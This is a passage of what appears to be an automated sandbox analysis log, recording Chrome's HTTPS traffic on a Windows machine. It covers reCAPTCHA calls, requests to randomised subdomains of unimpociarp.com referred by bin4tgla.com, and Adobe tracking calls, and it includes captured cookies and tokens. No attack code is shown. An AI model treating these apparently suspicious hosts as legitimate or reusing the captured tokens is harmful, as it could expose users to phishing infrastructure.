                                                                                                                                                                                                                                                                  2024-10-29 19:11:10 UTC744INData Raw: ea ad 32 82 3f 33 45 7c 44 ba 6d c4 8a 24 92 68 a1 2c 33 b5 cf 38 f5 a2 b3 4d 77 2b d9 b3 d1 97 c1 e2 ca ed 67 bd bc 9c 46 a3 72 98 61 38 1f 52 72 2a 8d cd b5 bb ea 12 5c cb 33 e5 fe 45 63 86 18 1f 41 c5 7a 74 da ac f1 95 76 b5 b7 21 f9 07 ce ea 3f 2a 6b ea f7 61 03 c7 6b 64 41 e7 fe 3e 3a fe 00 57 9a ea bd 8e b7 4a fb 1e 68 ba 44 17 0e 1e 19 ae 94 1e 86 38 c9 cf d3 23 35 ad 79 e1 fd 4f 51 b8 8a 4f b3 32 88 e0 58 80 92 16 60 d8 ef 82 07 35 d8 c9 ad de 22 ee 36 b6 c1 4f 40 1c 9f e4 29 87 5b bd 20 34 70 c3 8f 56 0d c7 f2 a6 aa f4 05 4b b9 c1 5a f8 3b 52 89 ee 6d d8 4a c2 56 51 b9 61 61 b7 04 1c 8e 31 52 5d f8 0e eb 22 49 cd f5 d3 16 e3 ca 55 e3 dc e4 8f 4a ed 8e bd 7e 39 58 ad 24 e7 19 05 80 e7 d6 98 3c 4b 75 e6 3c 72 59 8c 2a ee 0e 88 cc a7 8e 99 c8 fe 54
                                                                                                                                                                                                                                                                  Data Ascii: 2?3E|Dm$h,38Mw+gFra8Rr*\3EcAztv!?*kakdA>:WJhD8#5yOQO2X`5"6O@)[ 4pVKZ;RmJVQaa1R]"IUJ~9X$<Ku<rY*T
                                                                                                                                                                                                                                                                  2024-10-29 19:11:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  112192.168.2.1649844142.250.184.2284437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:14 UTC996OUTPOST /recaptcha/api2/userverify?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 8702
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:14 UTC8702OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 37 41 39 54 39 6f 30 65 6a 52 70 32 5a 58 50 6d 43 78 55 77 70 70 34 67 7a 75 38 6f 4f 45 33 78 72 55 74 42 5f 6d 66 73 44 4a 47 76 55 64 49 43 4d 33 39 47 4a 4e 6a 34 43 76 31 32 36 55 78 65 32 36 36 50 5f 35 52 32 34 5a 67 50 42 74 7a 44 74 41 49 36 55 45 52 70 55 75 43 66 4c 5f 4b 6a 65 6e 45 70 73 58 5f 52 37 36 33 66 55 48 43 31 62 47 4a 73 6d 78 6f 72 72 69 49 47 65 35 61 44 6f 79 56 43 52 50 44 70 6c 37 35 31 38 6f 4b 71 54 43 6e 67 76 4f 7a 32 75 56 35 45 41 4c 7a 4b 73 31 51 54 75 54 74 4f 75 30 52 79 6c 33 4b 50 64 31 48 73 46 6c 74 51 37 41 71 4a 4a 53 68 61 31 72 55 67 75 4e 37 57 4e 52 4b 6e 6c 31 53 5f 56 47 54 45 6c 43 62 34 68 49
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA7A9T9o0ejRp2ZXPmCxUwpp4gzu8oOE3xrUtB_mfsDJGvUdICM39GJNj4Cv126Uxe266P_5R24ZgPBtzDtAI6UERpUuCfL_KjenEpsX_R763fUHC1bGJsmxorriIGe5aDoyVCRPDpl7518oKqTCngvOz2uV5EALzKs1QTuTtOu0Ryl3KPd1HsFltQ7AqJJSha1rUguN7WNRKnl1S_VGTElCb4hI
                                                                                                                                                                                                                                                                  2024-10-29 19:11:14 UTC838INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:14 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:14 UTC540INData Raw: 61 35 63 0d 0a 29 5d 7d 27 0a 5b 22 75 76 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 72 74 74 5a 69 45 4a 42 68 51 70 6c 50 30 37 69 56 6b 65 75 66 32 53 53 5a 47 48 4e 58 79 4e 6b 56 6c 5a 35 65 4e 73 35 52 43 7a 71 5f 48 56 46 55 41 66 4c 4c 55 6e 61 6f 72 68 73 46 59 6c 6d 4f 71 4d 54 34 31 64 38 38 5a 32 2d 6b 4d 76 57 31 39 42 52 63 46 41 71 73 48 69 64 36 35 76 31 55 66 46 4b 6b 50 56 54 52 55 4c 6f 54 6f 6e 6a 73 67 4c 46 62 45 51 41 43 50 53 67 48 48 32 4c 48 4d 4d 65 38 76 70 31 41 4b 7a 6b 48 39 47 78 57 4f 75 38 44 67 4a 68 43 49 46 5f 4d 36 4b 65 79 36 50 54 5f 48 50 37 66 7a 4d 79 75 44 65 6e 61 70 66 48 66 33 53 53 6d 45 69 7a 46 71 55 48 79 79 6a 47 72 35 35 49 38 31 59 41 54 34 75 74 51 2d 48 38 78 4f 38 42 4e 49 62 77 6c 4c 38 2d 63
                                                                                                                                                                                                                                                                  Data Ascii: a5c)]}'["uvresp","03AFcWeA4rttZiEJBhQplP07iVkeuf2SSZGHNXyNkVlZ5eNs5RCzq_HVFUAfLLUnaorhsFYlmOqMT41d88Z2-kMvW19BRcFAqsHid65v1UfFKkPVTRULoTonjsgLFbEQACPSgHH2LHMMe8vp1AKzkH9GxWOu8DgJhCIF_M6Key6PT_HP7fzMyuDenapfHf3SSmEizFqUHyyjGr55I81YAT4utQ-H8xO8BNIbwlL8-c
                                                                                                                                                                                                                                                                  2024-10-29 19:11:14 UTC1378INData Raw: 78 32 68 72 64 6c 32 76 78 70 78 78 6c 36 53 76 6e 64 5a 73 6a 46 52 38 53 6a 34 4d 48 31 35 79 62 56 44 74 30 71 30 6e 4a 66 75 42 4f 61 79 5f 69 53 56 43 34 54 65 53 50 32 38 70 59 63 44 4f 32 39 7a 64 45 75 73 61 7a 4f 66 68 71 75 6a 51 72 63 4b 62 37 51 61 37 6f 48 71 35 4f 56 69 48 37 66 75 70 51 63 43 5f 61 6a 44 49 73 67 44 70 65 7a 64 4e 74 52 49 61 4e 42 42 4b 71 6b 52 4c 6c 4f 61 35 45 33 58 74 61 45 41 58 55 5f 38 6b 46 4e 49 54 38 6b 6b 41 73 36 36 52 5a 55 72 59 48 38 62 73 56 2d 2d 42 34 5a 66 5f 56 58 55 65 61 5f 57 72 6d 36 44 79 73 59 48 77 76 64 69 55 30 5f 46 63 55 67 54 32 63 71 41 32 77 6b 6e 76 44 36 37 6d 37 62 48 42 2d 61 71 66 75 44 44 52 71 64 33 54 4d 46 7a 62 48 50 47 4f 6a 49 5a 36 31 42 39 64 4a 68 45 67 4b 4e 39 75 47 4a 76
                                                                                                                                                                                                                                                                  Data Ascii: x2hrdl2vxpxxl6SvndZsjFR8Sj4MH15ybVDt0q0nJfuBOay_iSVC4TeSP28pYcDO29zdEusazOfhqujQrcKb7Qa7oHq5OViH7fupQcC_ajDIsgDpezdNtRIaNBBKqkRLlOa5E3XtaEAXU_8kFNIT8kkAs66RZUrYH8bsV--B4Zf_VXUea_Wrm6DysYHwvdiU0_FcUgT2cqA2wknvD67m7bHB-aqfuDDRqd3TMFzbHPGOjIZ61B9dJhEgKN9uGJv
                                                                                                                                                                                                                                                                  2024-10-29 19:11:14 UTC741INData Raw: 7a 50 67 30 31 77 4b 4a 4c 4c 71 6f 72 6a 46 36 2d 50 57 71 2d 53 57 4b 6c 68 31 57 52 51 38 67 36 6e 69 68 79 70 54 66 36 45 2d 6e 37 38 52 31 77 35 45 71 34 61 5a 47 39 62 39 63 34 44 7a 68 54 4f 6a 6b 31 35 36 79 44 4c 59 2d 72 61 4b 36 56 6f 78 49 55 49 55 75 48 79 2d 37 7a 73 37 48 70 6c 65 6b 76 56 72 53 63 4f 79 62 56 5a 6b 48 48 65 44 44 34 6a 74 2d 58 4b 73 63 6f 6f 37 73 6c 53 65 37 30 56 59 58 6c 61 4d 78 74 50 64 31 5f 6f 36 46 45 78 45 72 43 4a 69 54 67 57 73 37 52 31 52 58 74 62 32 54 77 70 79 41 6c 76 71 63 45 4e 61 56 32 32 32 54 42 5a 51 4d 5f 63 63 44 77 6b 4d 7a 59 71 67 74 50 34 59 44 79 38 6e 30 4a 61 61 68 35 57 76 70 58 44 58 75 57 36 34 39 6f 58 73 56 78 33 62 4f 45 52 77 32 6a 62 6c 52 6b 7a 4f 47 38 56 66 36 50 74 77 6b 78 31 61
                                                                                                                                                                                                                                                                  Data Ascii: zPg01wKJLLqorjF6-PWq-SWKlh1WRQ8g6nihypTf6E-n78R1w5Eq4aZG9b9c4DzhTOjk156yDLY-raK6VoxIUIUuHy-7zs7HplekvVrScOybVZkHHeDD4jt-XKscoo7slSe70VYXlaMxtPd1_o6FExErCJiTgWs7R1RXtb2TwpyAlvqcENaV222TBZQM_ccDwkMzYqgtP4YDy8n0Jaah5WvpXDXuW649oXsVx3bOERw2jblRkzOG8Vf6Ptwkx1a
                                                                                                                                                                                                                                                                  2024-10-29 19:11:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  113192.168.2.1649845142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:15 UTC610OUTGET /recaptcha/api2/userverify?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:15 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:15 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:15 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:11:15 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:11:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  114192.168.2.1649847188.114.96.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:15 UTC667OUTGET /qdpjrzhatduxxtuetbpHeUBGVUCFBHGNDJGJTMHXFMZFJYWFCBGLPUJYUAPTPOGHOIQ HTTP/1.1
                                                                                                                                                                                                                                                                  Host: hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://usqe.bin4tgla.com
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://usqe.bin4tgla.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:16 UTC869INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:16 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4NYmFc6L5Av1VHW3Wdr1Z3Dk%2BtUlcK1pkCe3270XPwTXZOZ3yER6sqU7NMSTW1Z447%2FqdfwtRldhEOcflYzworaNj6wuFI09siHElUXRGCXQiN6Ocg1Asmkj9NzkLHAKHl71CKDMwahY1tezk3D0tiYCveFLJZkktE%2BacQ1C6nYxVmqe1fkVa2RwEsAYJyMgnNHcmS1rkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da5786b6eaf6b77-DFW
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1204&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1245&delivery_rate=2358306&cwnd=250&unsent_bytes=0&cid=162d67c3c9aae88c&ts=833&x=0"
                                                                                                                                                                                                                                                                  2024-10-29 19:11:16 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 11
                                                                                                                                                                                                                                                                  2024-10-29 19:11:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  115192.168.2.1649851188.114.96.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:18 UTC459OUTGET /qdpjrzhatduxxtuetbpHeUBGVUCFBHGNDJGJTMHXFMZFJYWFCBGLPUJYUAPTPOGHOIQ HTTP/1.1
                                                                                                                                                                                                                                                                  Host: hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:18 UTC872INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:18 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9x3PAKxEBRyKZdPFSSojZcrE3kSa4xy2iTuK%2FDoUyGKo1Jvga8hfa%2F9gVyyttRvSmghfkuzEt4EvIEUXwjrCcS1ZBV6Ucx4NTxixEl9iL9BhVVAxs0jf2kczh7vfg6ZZwUuCvTfB9Gduz%2BIeJpcpr2Dsf8oNDMLXCMZDa99yoaj%2B%2B6tQaLBElNW9M0ntBPAvHXajHJ4BBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da5787a689ab0eb-ATL
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=20185&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1037&delivery_rate=143359&cwnd=32&unsent_bytes=0&cid=7fec32f128152ddc&ts=810&x=0"
                                                                                                                                                                                                                                                                  2024-10-29 19:11:18 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 11
                                                                                                                                                                                                                                                                  2024-10-29 19:11:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  116192.168.2.164988854.194.45.2274437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:23 UTC722OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1730229081200 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dpm.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:23 UTC947INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:23 GMT
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: 7kan3MuBTGY=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                  Location: https://dpm.demdex.net/id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1730229081200
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-2-v067-0db54ea90.edge-irl1.demdex.com 0 ms
                                                                                                                                                                                                                                                                  set-cookie: demdex=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:23 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  117192.168.2.164989554.194.45.2274437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
